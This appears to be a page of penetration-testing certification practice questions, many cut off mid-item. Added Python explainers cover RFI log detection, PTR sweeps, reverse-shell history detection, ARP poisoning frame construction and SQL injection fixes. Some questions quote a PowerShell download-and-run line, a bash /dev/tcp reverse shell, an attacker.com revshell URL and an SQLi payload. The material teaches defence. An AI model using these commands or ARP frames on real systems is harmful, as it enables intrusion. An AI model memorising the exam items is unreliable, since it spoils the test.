Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads? A. Creating a scope

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use? A. HKEY_CLASSES_ROOT B. HKEY_LOCAL_MACHINE C. HKEY_CURRENT_USER D. HKEY_CURRENT_CONFIG

In which of the following scenarios would a tester perform a Kerberoasting attack? A. The tester has compromised a Windows device and dumps the LSA secrets. B. The tester needs

Which of the following excerpts would come from a corporate policy? A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric. B. The help desk can

Consider the following PowerShell command: powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet Which of the following BEST describes the actions performed by this command? A. Set the execution policy. B. Execute a

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them? A. Locating emergency exits B. Preparing a pretext C.

A penetration tester is performing a code review. Which of the following testing techniques is being performed? A. Dynamic analysis B. Fuzzing analysis C. Static analysis D. Run-time analysis Answer:

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy? A. Enable HTTP Strict Transport

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack. Which of the following remediation steps should be recommended? (Select THREE).

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php Which of the following remediation steps should be taken to prevent this type of attack?
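The URL above is the classic remote file inclusion shape: a query parameter whose value is itself a URL, handed to an include-style sink on the server. The following Python is an added example (not part of the original question bank) that runs a detection over constructed WAF log lines in the form "timestamp client-ip status request-url" and shows the remediation beside it, an allowlist lookup in which the user supplies a key and never a path or URL. The log lines, the trusted host set and the page table are assumptions for the demo; only the first URL comes from the question.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed WAF log sample (first URL is the one quoted in the question, the rest are made up).
SAMPLE_WAF_LOG = """\
2024-03-01T10:00:01Z 203.0.113.7 200 https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
2024-03-01T10:00:02Z 203.0.113.7 200 https://example.com/index.php?Phone=555-0100
2024-03-01T10:00:03Z 198.51.100.9 200 https://example.com/index.php?page=//evil.example/shell.txt
2024-03-01T10:00:04Z 198.51.100.9 200 https://example.com/index.php?page=about&ref=https://example.com/home
2024-03-01T10:00:05Z 198.51.100.9 200 https://example.com/index.php?page=php://input
"""

TRUSTED_HOSTS = {"example.com"}          # assumed: hosts the application may legitimately reference
REMOTE_SCHEMES = {"", "http", "https", "ftp", "ftps"}  # "" covers protocol-relative //host/path

# A value beginning with "scheme:" or "//" is a URL or a stream wrapper, the shapes that turn
# an include()/require() style sink into remote file inclusion.
URL_LIKE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:|//)", re.IGNORECASE)


def rfi_candidates(url, trusted_hosts=TRUSTED_HOSTS):
    """Return (param, value, host) for each query value that points somewhere outside the app.
    host is None for non-network wrappers such as php://, data:, file:."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        v = value.strip()
        if not URL_LIKE.match(v):
            continue
        parts = urlsplit(v)
        if parts.scheme.lower() in REMOTE_SCHEMES:
            host = (parts.hostname or "").lower()
            if host in trusted_hosts:
                continue
            hits.append((name, v, host or None))
        else:
            hits.append((name, v, None))
    return hits


def scan_waf_log(text):
    """Detection: (client_ip, param, remote host or 'scheme:') for each RFI-shaped request."""
    findings = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        client, url = fields[1], fields[-1]
        for name, value, host in rfi_candidates(url):
            findings.append((client, name, host if host else value.split(":", 1)[0].lower() + ":"))
    return findings


# Remediation: the request carries an opaque key; the server maps it to a file it chose itself.
ALLOWED_PAGES = {"about": "pages/about.php", "home": "pages/home.php"}  # assumed page table


def resolve_include(page):
    """Returns the local file for a known page key, or None (caller answers 404)."""
    return ALLOWED_PAGES.get(page)


if __name__ == "__main__":
    for client, param, where in scan_waf_log(SAMPLE_WAF_LOG):
        print(f"RFI attempt from {client}: parameter {param!r} -> {where}")
    print(resolve_include("about"), resolve_include("http://attacker.com/badstuffhappens/revshell.php"))
```

The allowlist is the fix the question is after; on a PHP stack the platform-level backstop is also to leave allow_url_include off, so that even a regression in the application code cannot fetch the include over the network. Blocking attacker.com at the WAF only removes this one source.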

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform? A. Vulnerability scan B. Dynamic scan C.

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends form field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

A penetration tester wants to script out a way to discover all the PTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?
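A PTR sweep is just a reverse lookup for every address in the range, which is what a DNS list scan such as nmap -sL does without sending a packet to the targets. The Python below is an added example (not from the original question bank) that builds the in-addr.arpa / ip6.arpa query name for each host, resolves the range concurrently, and accepts an injected resolver so it can be exercised offline; the FAKE_PTR_ZONE entries and the 192.0.2.8/29 range are assumptions for the demo, and system_resolver is the path that does real lookups.

```python
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Callable, Dict, List, Optional, Tuple

# Hypothetical reverse zone used for the offline demo (assumed, not real data).
FAKE_PTR_ZONE = {
    "192.0.2.10": "mail.example.net",
    "192.0.2.12": "vpn.example.net",
    "2001:db8::1": "gw.example.net",
}


def reverse_name(ip: str) -> str:
    """The owner name a PTR query asks for: 9.2.0.192.in-addr.arpa, or the nibble form under ip6.arpa."""
    return ipaddress.ip_address(ip).reverse_pointer


def system_resolver(ip: str) -> Optional[str]:
    """Real PTR lookup through the OS resolver (needs network; not used by the offline demo)."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except (socket.herror, socket.gaierror):
        return None


def ptr_sweep(network: str,
              resolver: Callable[[str], Optional[str]] = system_resolver,
              workers: int = 32) -> Dict[str, Optional[str]]:
    """Resolve every host address in a CIDR range concurrently; returns {ip: name-or-None}.
    Reverse lookups are independent, so a thread pool is the cheap way to make the sweep fast."""
    hosts = [str(h) for h in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        names = list(pool.map(resolver, hosts))
    return dict(zip(hosts, names))


def named_hosts(results: Dict[str, Optional[str]]) -> List[Tuple[str, str]]:
    """Only the addresses that actually have a PTR record, in address order."""
    return [(ip, name) for ip, name in results.items() if name]


if __name__ == "__main__":
    demo = ptr_sweep("192.0.2.8/29", resolver=FAKE_PTR_ZONE.get)   # offline run
    for ip, name in named_hosts(demo):
        print(f"{ip:15} {reverse_name(ip):28} {name}")
    print(reverse_name("2001:db8::1"))
```

Swap FAKE_PTR_ZONE.get for the default system_resolver to sweep a real range; PTR names are attacker-controlled data from the target's DNS, so treat them as hints for host roles, not as verified facts.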

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ”changepass.”
-sr-xr-x 1 root root 6443 Oct 18
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

During testing, a critical vulnerability is discovered on a client’s core server. Which of the following should be the NEXT action? A. Disable the network port of the affected service.

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of? A. Lockpicking B. Egress sensor triggering C.

The following line was found in an exploited machine’s history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0>&1 Which of the following describes what the
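The command in the history file is a bash reverse shell: ">&" sends the interactive shell's stdout and stderr into the /dev/tcp/192.168.0.1/80 pseudo-file, which bash opens as a TCP connection, and "0>&1" points stdin at that same socket, so whoever listens on 192.168.0.1:80 drives the shell. The following Python is an added example (not from the original question bank) of the forensic side: a detector run over constructed shell-history lines that classifies the common reverse-shell idioms and extracts the callback endpoint. Only the /dev/tcp line comes from the question; the other history lines and the 10.10.10.5 addresses are made up.

```python
import re
from typing import Dict, List, Tuple

# Constructed shell-history sample; line 2 is the command quoted in the question.
SAMPLE_HISTORY = [
    "ls -la /var/www",
    "bash -i >& /dev/tcp/192.168.0.1/80 0>&1",
    "nc -e /bin/sh 10.10.10.5 4444",
    "python3 -c 'import socket,os,pty;s=socket.socket();s.connect((\"10.10.10.5\",9001));os.dup2(s.fileno(),0)'",
    "ssh -R 2222:localhost:22 user@10.10.10.5",
]

# Each pattern names an idiom and captures the host:port it calls back to.
#  - bash: /dev/tcp/HOST/PORT is a socket; ">&" = stdout+stderr into it, "0>&1" = stdin from it
#  - netcat: -e executes a program with the connection as its stdio
#  - python: a raw socket connect followed by dup2() onto fds 0/1/2
REVERSE_SHELL_PATTERNS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("bash /dev/tcp redirection",
     re.compile(r"/dev/(?:tcp|udp)/(?P<host>[\w.\-]+)/(?P<port>\d{1,5})")),
    ("netcat -e",
     re.compile(r"\b(?:nc|ncat|netcat)\b.*?\s-e\s+\S+\s+(?P<host>[\w.\-]+)\s+(?P<port>\d{1,5})\b")),
    ("python socket connect",
     re.compile(r"connect\(\(\s*[\"'](?P<host>[\w.\-]+)[\"']\s*,\s*(?P<port>\d{1,5})")),
]


def find_reverse_shells(history: List[str]) -> List[Dict[str, object]]:
    """Classify each history line by the first idiom that matches; one finding per line."""
    findings = []
    for lineno, line in enumerate(history, 1):
        for technique, pattern in REVERSE_SHELL_PATTERNS:
            m = pattern.search(line)
            if m:
                findings.append({
                    "line": lineno,
                    "technique": technique,
                    "host": m.group("host"),
                    "port": int(m.group("port")),
                    "command": line,
                })
                break
    return findings


def callback_endpoints(findings: List[Dict[str, object]]) -> List[Tuple[str, int]]:
    """Distinct host:port pairs to hand to the network team for blocking and hunting."""
    return sorted({(f["host"], f["port"]) for f in findings})


if __name__ == "__main__":
    hits = find_reverse_shells(SAMPLE_HISTORY)
    for h in hits:
        print(f"line {h['line']}: {h['technique']} -> {h['host']}:{h['port']}")
    print(callback_endpoints(hits))
```

Note that the port is 80 in the question's command: the callback is chosen to blend into outbound web traffic, so an egress rule that only watches "unusual" ports would miss it, and the history file, not the port, is what gave it away here.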

Which of the following are MOST important when planning for an engagement? (Select TWO). A. Goals/objectives B. Architectural diagrams C. Tolerance to impact D. Storage time for a report E.

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

Which of the following commands starts the Metasploit database? A. msfconsole B. workspace C. msfvenom D. db_init E. db_connect Answer: A

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this? A. Manufacturers developing IoT devices are

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow? A. Stack pointer register B. Index pointer register C.

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

Which of the following is an example of a spear phishing attack? A. Targeting an executive with an SMS attack B. Targeting a specific team with an email attack C.

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below: IP: 192.168.1.20 NETMASK: 255.255.255.0 DEFAULT GATEWAY: 192.168.1.254 DHCP: 192.168.1.253 DNS: 192.168.10.10,
Which of the following commands should the malicious user execute to perform the MITM attack?

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information? A. MAC address of the client
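Both the MITM question above (victim 192.168.1.20, gateway 192.168.1.254) and this one come down to the same two ARP replies: one telling the victim that the gateway's IP lives at the attacker's MAC, one telling the gateway that the victim's IP does, which is what a tool invocation of the shape arpspoof -i <iface> -t 192.168.1.20 192.168.1.254 repeats on the wire. Impersonating the gateway is what captures the most, because every off-subnet conversation the victim has passes through it. The Python below is an added example (not from the original question bank) that builds and parses those frames byte for byte and includes the defender's check that flags a known IP answering from an unexpected MAC. It only constructs bytes; putting them on the wire needs a raw socket, and the attacker must forward traffic or the victim loses connectivity. The MAC addresses are assumptions; the IPs are the question's.

```python
import struct
from typing import Dict, List, Tuple

ETHERTYPE_ARP = b"\x08\x06"

# Addresses from the question; MACs are assumed for the demo.
VICTIM_IP, GATEWAY_IP = "192.168.1.20", "192.168.1.254"
VICTIM_MAC, GATEWAY_MAC, ATTACKER_MAC = "02:00:00:00:00:20", "02:00:00:00:00:fe", "02:00:00:00:00:aa"


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(o) for o in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def arp_reply(sender_mac: str, sender_ip: str, target_mac: str, target_ip: str) -> bytes:
    """Ethernet II frame carrying an ARP reply (opcode 2) that asserts 'sender_ip is at sender_mac'."""
    ethernet = mac_bytes(target_mac) + mac_bytes(sender_mac) + ETHERTYPE_ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, 2)      # hw=Ethernet, proto=IPv4, lens 6/4, reply
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return ethernet + arp


def poison_frames(attacker_mac: str, victim_mac: str, victim_ip: str,
                  gateway_mac: str, gateway_ip: str) -> Tuple[bytes, bytes]:
    """The pair an arpspoof-style tool resends every few seconds: the victim's cache learns
    gateway_ip -> attacker_mac and the gateway's cache learns victim_ip -> attacker_mac,
    so both directions of the victim's off-subnet traffic transit the attacker."""
    to_victim = arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def parse_arp(frame: bytes) -> Dict[str, object]:
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    _htype, _ptype, _hlen, _plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
        "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42]),
    }


def arp_conflicts(frames: List[bytes], known: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Defender's check (what a static ARP table or DAI enforces): replies whose sender_ip is a
    known host but whose sender_mac is not the one on record. Returns (ip, expected, seen)."""
    conflicts = []
    for frame in frames:
        p = parse_arp(frame)
        expected = known.get(p["sender_ip"])
        if p["opcode"] == 2 and expected and expected.lower() != p["sender_mac"]:
            conflicts.append((p["sender_ip"], expected.lower(), p["sender_mac"]))
    return conflicts


if __name__ == "__main__":
    to_victim, to_gateway = poison_frames(ATTACKER_MAC, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    print(parse_arp(to_victim))
    print(arp_conflicts([to_victim, to_gateway], {GATEWAY_IP: GATEWAY_MAC, VICTIM_IP: VICTIM_MAC}))
```

Because the attack rewrites the victim's idea of where the gateway is rather than anything on the switch, the recommendation that follows from the check in arp_conflicts is dynamic ARP inspection or static entries for the gateway, not just more switch port security.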

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO). A. Shodan B. SET C. BeEF D. Wireshark E. Maltego F. Dynamo Answer: AE

Black box penetration testing strategy provides the tester with: A. a target list B. a network diagram C. source code D. privileged credentials Answer: A

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
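The recommendation that removes this class of finding is to stop building SQL from the text-box value: bind parameters so the driver never lets input become part of the query, and validate the input format as defense in depth. The Python below is an added example (not from the original question bank) that shows the vulnerable lookup beside both fixes against an in-memory SQLite table; the users table and its rows are constructed for the demo, and the tautology payload is the standard ' OR '1'='1.

```python
import re
import sqlite3
from typing import List, Tuple

Row = Tuple[str, str]


def build_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the 'information store'; rows are made up for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, secret TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (username, secret) VALUES (?, ?)",
                     [("alice", "a-secret"), ("bob", "b-secret"), ("carol", "c-secret")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> List[Row]:
    """The finding: the text-box value is spliced into the SQL grammar, so a quote in the
    input closes the literal and the rest of the input is executed as SQL."""
    sql = "SELECT username, secret FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, username: str) -> List[Row]:
    """Remediation 1: a bound parameter is always data; quotes in it never reach the parser."""
    return conn.execute("SELECT username, secret FROM users WHERE username = ?", (username,)).fetchall()


# Remediation 2 (defense in depth): an allowlist for the input format, applied before the query.
USERNAME_RE = re.compile(r"[a-z][a-z0-9_]{0,31}")


def lookup_hardened(conn: sqlite3.Connection, username: str) -> List[Row]:
    if not USERNAME_RE.fullmatch(username):
        return []          # reject rather than sanitize; the caller reports invalid input
    return lookup_parameterized(conn, username)


if __name__ == "__main__":
    db = build_demo_db()
    payload = "' OR '1'='1"
    print("vulnerable   :", lookup_vulnerable(db, payload))     # every row comes back
    print("parameterized:", lookup_parameterized(db, payload))  # no row has that literal name
    print("hardened     :", lookup_hardened(db, payload))
    print("normal       :", lookup_hardened(db, "alice"))
```

Validation alone is not the fix: a username field can be constrained, but a free-text box such as a search or comment field cannot, and only the parameterized query protects that case.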

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation? A. Stored XSS B. Fill

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service? A. arpspoof B. nmap C. responder

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement? A. To remove the persistence B.

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.) A. The tester discovers personally